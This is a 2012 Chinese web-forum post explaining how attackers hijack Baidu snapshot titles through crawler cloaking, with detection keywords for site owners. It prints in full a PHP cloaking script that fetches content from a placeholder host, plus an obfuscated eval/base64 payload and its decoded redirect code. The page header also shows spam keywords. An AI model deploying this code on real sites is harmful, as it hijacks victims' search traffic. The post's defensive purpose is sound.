亚洲欧美成人综合一区_国产精品一区二区无码_亚洲风情偷拍区_成?人免费无码视频在线看

西安做網站_西安網站建設公司_西安網頁制作_西安網頁設計_西安網站制作設計公司

 找回密碼
 注冊

QQ登錄

只需一步,快速開始

搜索
查看: 10763|回復: 0
打印 上一主題 下一主題

篡改百度快照網頁標題的解決方法

[復制鏈接]
跳轉到指定樓層
樓主
發(fā)表于 2012-10-13 18:22:19 | 只看該作者 回帖獎勵 |倒序瀏覽 |閱讀模式


最近客戶網站雖然百度收錄了三四萬 但發(fā)現好多快照標題不是自己網站的標題,麻煩啊 經過仔細查找 重要找到了解決辦法。
所謂的黑客利用漏洞 或者文件上傳可以修改程序文件或者上傳程序文件,這個文件是干啥的呢?就是用來區(qū)分是蜘蛛還是平常訪問,如果是蜘蛛爬行的話 他就引導蜘蛛抓他網站的頁面,導致快照標題是黑客搞的 點進去卻是自己網站的標題。

     類似這樣的篡改網頁標題的方法 現在發(fā)現有倆種

1、這些人會上傳一個文件 文件是:
  1. <?php
  2. @error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);
  3. ini_set('display_errors',0);

  4. $spider_arr = array(
  5.         'baiduspider',
  6.         'baiduspider/2.0',
  7.         'baiducustomer',
  8.         'baidu-thumbnail',
  9.         'baiduspider-mobile-gate',
  10.         'baiduspider-mobile-gate',
  11.         'baidu-transcoder/1.0.6.0',

  12.         'googlebot/2.1',
  13.         'googlebot-image/1.0',
  14.         'feedfetcher-google',
  15.         'mediapartners-google',
  16.         'adsbot-google',
  17.         'googlebot-mobile/2.1',
  18.         'googlefriendconnect/1.0',

  19.         'sosospider',
  20.         'sosoblogspider',
  21.         'sosoimagespider',

  22.         'sogou web robot',
  23.         'sogou web spider/3.0',
  24.         'sogou web spider/4.0',
  25.         'sogou head spider/3.0',
  26.         'sogou-test-spider/4.0',
  27.         'sogou orion spider/4.0',
  28. );

  29. $not_spider_ip_arr = array(
  30.         "222.77.187.33",
  31.         "125.90.88.96"
  32. );

  33. $ref_arr = array(
  34.     'baidu.com',
  35.     'google.com'
  36. );

  37. $agent = $_SERVER['HTTP_USER_AGENT'];
  38. $rip = $_SERVER["REMOTE_ADDR"];
  39. $referer = $_SERVER["HTTP_REFERER"];

  40. $spider = false;
  41. foreach($spider_arr as $_spider) {
  42.         if(stripos($agent,$_spider) !== false) {
  43.                 $spider = true;
  44.                 break;
  45.         }
  46. }

  47. if(in_array($rip,$not_spider_ip_arr)) {
  48.         $spider = false;
  49. }

  50. $ref = false;
  51. foreach($ref_arr as $_ref) {
  52.         if(stripos($referer,$_ref) !== false) {
  53.                 $ref = true;
  54.                 break;
  55.         }
  56. }


  57. if(array_key_exists('bd',$_GET)&&$ref) {
  58.         $xt = trim($_GET['bd']);
  59.         Header("Location: ".'http://www.baidu.com?'.$_SERVER['SERVER_NAME']);
  60.         exit;
  61. }

  62. if($spider) {
  63.         echo file_get_contents('http://www.xxx.cn/web/bbs/xin.asp');
  64. }
  65. ?>
復制代碼
所以有遇到這樣情況的站站 請根據這個程序的關鍵字進行批量查找網站,比如 批量查找 echo file_get_contents( 這樣的關鍵詞語。如果您懂程序 就會發(fā)現 此程序的原理就是我剛說的 。

2、這些人 會 在網站上掛上


  1. eval(gzinflate(base64_decode('hVZ7b9owEP8fie/gWlGbrBASWFlbRqtuZRpTH4hV2ySGIje4xWpeckxY1fHdd3YeBGg6FMnx3e/ufvewSb1Wr1HOQ+5wGoVcsOBRt4xeveZ6JI4R8bxw6bAIvdRrqF5LCEdaIesjwjl51rHd7ph2+8j8YJt2s31k4QZuWx2zbR2bXcu0u1Ym7HbN9vsTs3sMKpC1FbANiGMwBLBtK6EMD8EeFoErWBggx3HDIBZ84QrdACKrbfWM7mgjzhIiKCpQPnmiI04fhyNdA7RRr8mUEHtAOmzhUeIGbmLDUNnCTyPDEWRJ/0ReOKM6NnFD2fZS9UPIKXHnSFc4EiPtqX+mJYV56n0vd59sOlcBImDkeMxnApl9pIk5i5tnZapJHmwLClx6uZ8Vol5My24Ji24Wfpl6E6gnJeK6xvoZbGJNexr7WGxtuT08NAqHKjQEVes5/otNjZ3iiVx666CrqrQgeR6FsV6SNmQpbaPfl7X3aFDWGU3bOFd7E0/xKSDNYrdOOX1RS5p+0bNSbKgo+FdG6VQgxKlY8KCM6lWOzCMVF573yQvdJ2hFXg/Z06xR+UnY7CmDuHapMOsx2bR6dWJyHxGZzTiN0RtDsWMCYEjXYXCSPeKm84p/y6HN3Rm9KqPC5h3YTKzmyfTFbnRWyvYVq4IdbskxiExYd1FQ4FhMpjKJ3GQHdHi4O0PZkvcqc7Ru1OLeY+66T+6cph2SZQS0IPceXVduq43gRhvG30IW0BmAHggMj5JFGyaO6zEaCOhTZiLVgjNfh1cpUXOQBVORsz4XQtXfhHiLVC3xaup8IgCFX1KdLDE4TEdgTsmMch1/vbsbteBORB3LRtdhAkxHlPskAEbes7ogc+hV6BJZhVM0FyI6bbWWy6VJ3XgeRoL60FRBTTf0lY0qYPrUa1l14eKkbx6BciGyNEBKgySl6Xy+Gg5u7pzhCBtof18Ok0ti6vpRJayB8CJ4CsJlANeh6hiUtgoM3NTx3on7y/lyO/55Mb4cXMq3t6PvgP/PYcfkNSbjwfXt3cC5uLysJrCBeTPuBrIcjsUxFbrmfB+MfwzGk4MS8GCq4lbotihVoF4lVYHNaOWowrCXT5Se3RirfKi0UJ299IshoMvio0JPj5GO9taQ5tn6NBvw96Xu538=')));
復制代碼
這樣的東東,其實懂程序的人也知道 他只是障眼法,這個是通過encoded_data 這個函數把php程序進行壓縮,我們發(fā)現通過 base64_decode解碼出來后 是:


  1. <?php


  2. error_reporting(0);
  3. class allow_ip {

  4. var $allow_ip = array("123.125.71.1-250","203.208.60.160-250","66.249.68.200-220","220.181.108.11-220");

  5. function __construct(){
  6. }

  7. function __destruct(){
  8. }

  9. private function makePregIP($str)
  10. {
  11.   if (strstr($str,"-")) {
  12.     $aIP = explode(".",$str);
  13.     foreach ($aIP as $k=>$v) {
  14.       if (!strstr($v,"-")) {
  15.         $preg_limit .= $this->makePregIP($v);
  16.     $preg_limit .= ".";
  17.       } else{
  18.         $aipNum = explode("-",$v);
  19.     for($i=$aipNum[0];$i<=$aipNum[1];$i++){
  20.       $preg .=$preg?"|".$i:"[".$i;
  21.         }
  22.         $preg_limit .=strrpos($preg_limit,".",1)==(strlen($preg_limit)-1)?$preg."]":".".$preg."]";
  23.       }
  24.     }
  25.   } else {
  26.     $preg_limit = $str;
  27.   }

  28.   return $preg_limit;
  29. }

  30. private function getAllBlockIP(){
  31.     if ($this->allow_ip) {
  32.         $i = 1;
  33.         foreach ($this->allow_ip as $k=>$v) {
  34.             $ipaddres = $this->makePregIP($v);

  35.             $ip = str_ireplace(".","\.",$ipaddres);
  36.             $ip = str_replace("*","[0-9]{1,3}",$ip);
  37.             $ipaddres = "/".$ip."/";
  38.             $ip_list[] = $ipaddres;
  39.             $i++;
  40.         }
  41.     }
  42.     return $ip_list;
  43. }

  44. public function checkIP() {
  45. $iptable = $this->getAllBlockIP();
  46. $IsJoined = false;
  47. $Ip = $this->get_client_ip();
  48. $Ip = trim($Ip);
  49. if ($iptable) {
  50. foreach($iptable as $value) {
  51. if (preg_match("{$value}",$Ip)) {
  52. header("HTTP/1.1 301 Moved Permanently");
  53. header("Location: http://www.xxxx.com");

  54. }
  55. }
  56. }

  57. return true;
  58. }

  59. private function get_client_ip(){
  60. if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
  61. $ip = getenv("HTTP_CLIENT_IP");
  62. else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
  63. $ip = getenv("HTTP_X_FORWARDED_FOR");
  64. else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
  65. $ip = getenv("REMOTE_ADDR");
  66. else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
  67. $ip = $_SERVER['REMOTE_ADDR'];
  68. else
  69. $ip = "unknown";
  70. return($ip);
  71. }
  72. }

  73. $oBlock_ip = new allow_ip();
  74. if( !$oBlock_ip->checkIP() ) exit;


  75. ?>
復制代碼

那么第二種方式 站長可以用 eval(gzinflate(base64_decode 關鍵字進行批量查找程序  看是否有。

以上就是目前發(fā)現的2種掛馬 篡改快照的方法。

西安網站建設 | 西安做網站 —— 劍鋒所指 所向披靡!
您需要登錄后才可以回帖 登錄 | 注冊

本版積分規(guī)則

QQ|小黑屋|手機版|Archiver|西安網站建設

GMT+8, 2024-10-22 18:46 , Processed in 0.041363 second(s), 14 queries .

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回復 返回頂部 返回列表